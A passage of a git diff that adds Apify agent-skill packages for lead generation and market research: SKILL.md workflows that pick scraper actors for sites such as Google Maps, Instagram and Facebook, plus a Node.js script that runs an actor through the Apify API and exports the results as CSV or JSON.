+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-lead-generation/SKILL.md b/web-app/public/skills/apify-lead-generation/SKILL.md
new file mode 100644
index 00000000..18d01f3e
--- /dev/null
+++ b/web-app/public/skills/apify-lead-generation/SKILL.md
@@ -0,0 +1,120 @@
+---
+name: apify-lead-generation
+description: "Generates B2B/B2C leads by scraping Google Maps, websites, Instagram, TikTok, Facebook, LinkedIn, YouTube, and Google Search. Use when user asks to find leads, prospects, businesses, build lead lis..."
+---
+
+# Lead Generation
+
+Scrape leads from multiple platforms using Apify Actors.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Determine lead source (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the lead finder script
+- [ ] Step 5: Summarize results
+```
+
+### Step 1: Determine Lead Source
+
+Select the appropriate Actor based on user needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Local businesses | `compass/crawler-google-places` | Restaurants, gyms, shops |
+| Contact enrichment | `vdrmota/contact-info-scraper` | Emails, phones from URLs |
+| Instagram profiles | `apify/instagram-profile-scraper` | Influencer discovery |
+| Instagram posts/comments | `apify/instagram-scraper` | Posts, comments, hashtags, places |
+| Instagram search | `apify/instagram-search-scraper` | Places, users, hashtags discovery |
+| TikTok videos/hashtags | `clockworks/tiktok-scraper` | Comprehensive TikTok data extraction |
+| TikTok hashtags/profiles | `clockworks/free-tiktok-scraper` | Free TikTok data extractor |
+| TikTok user search | `clockworks/tiktok-user-search-scraper` | Find users by keywords |
+| TikTok profiles | `clockworks/tiktok-profile-scraper` | Creator outreach |
+| TikTok followers/following | `clockworks/tiktok-followers-scraper` | Audience analysis, segmentation |
+| Facebook pages | `apify/facebook-pages-scraper` | Business contacts |
+| Facebook page contacts | `apify/facebook-page-contact-information` | Extract emails, phones, addresses |
+| Facebook groups | `apify/facebook-groups-scraper` | Buying intent signals |
+| Facebook events | `apify/facebook-events-scraper` | Event networking, partnerships |
+| Google Search | `apify/google-search-scraper` | Broad lead discovery |
+| YouTube channels | `streamers/youtube-scraper` | Creator partnerships |
+| Google Maps emails | `poidata/google-maps-email-extractor` | Direct email extraction |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `compass/crawler-google-places`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Results
+
+After completion, report:
+- Number of leads found
+- File location and name
+- Key fields available
+- Suggested next steps (filtering, enrichment)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-lead-generation/reference/scripts/run_actor.js b/web-app/public/skills/apify-lead-generation/reference/scripts/run_actor.js
new file mode 100644
index 00000000..6cd4acc2
--- /dev/null
+++ b/web-app/public/skills/apify-lead-generation/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-lead-generation-1.1.11';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-market-research/SKILL.md b/web-app/public/skills/apify-market-research/SKILL.md
new file mode 100644
index 00000000..95e926b4
--- /dev/null
+++ b/web-app/public/skills/apify-market-research/SKILL.md
@@ -0,0 +1,119 @@
+---
+name: apify-market-research
+description: Analyze market conditions, geographic opportunities, pricing, consumer behavior, and product validation across Google Maps, Facebook, Instagram, Booking.com, and TripAdvisor.
+---
+
+# Market Research
+
+Conduct market research using Apify Actors to extract data from multiple platforms.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Identify market research type (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the analysis script
+- [ ] Step 5: Summarize findings
+```
+
+### Step 1: Identify Market Research Type
+
+Select the appropriate Actor based on research needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Market density | `compass/crawler-google-places` | Location analysis |
+| Geospatial analysis | `compass/google-maps-extractor` | Business mapping |
+| Regional interest | `apify/google-trends-scraper` | Trend data |
+| Pricing and demand | `apify/facebook-marketplace-scraper` | Market pricing |
+| Event market | `apify/facebook-events-scraper` | Event analysis |
+| Consumer needs | `apify/facebook-groups-scraper` | Group research |
+| Market landscape | `apify/facebook-pages-scraper` | Business pages |
+| Business density | `apify/facebook-page-contact-information` | Contact data |
+| Cultural insights | `apify/facebook-photos-scraper` | Visual research |
+| Niche targeting | `apify/instagram-hashtag-scraper` | Hashtag research |
+| Hashtag stats | `apify/instagram-hashtag-stats` | Market sizing |
+| Market activity | `apify/instagram-reel-scraper` | Activity analysis |
+| Market intelligence | `apify/instagram-scraper` | Full data |
+| Product launch research | `apify/instagram-api-scraper` | API access |
+| Hospitality market | `voyager/booking-scraper` | Hotel data |
+| Tourism insights | `maxcopell/tripadvisor-reviews` | Review analysis |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `compass/crawler-google-places`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Findings
+
+After completion, report:
+- Number of results found
+- File location and name
+- Key market insights
+- Suggested next steps (deeper analysis, validation)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-market-research/reference/scripts/run_actor.js b/web-app/public/skills/apify-market-research/reference/scripts/run_actor.js
new file mode 100644
index 00000000..7a0a904b
--- /dev/null
+++ b/web-app/public/skills/apify-market-research/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-market-research-1.0.0';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
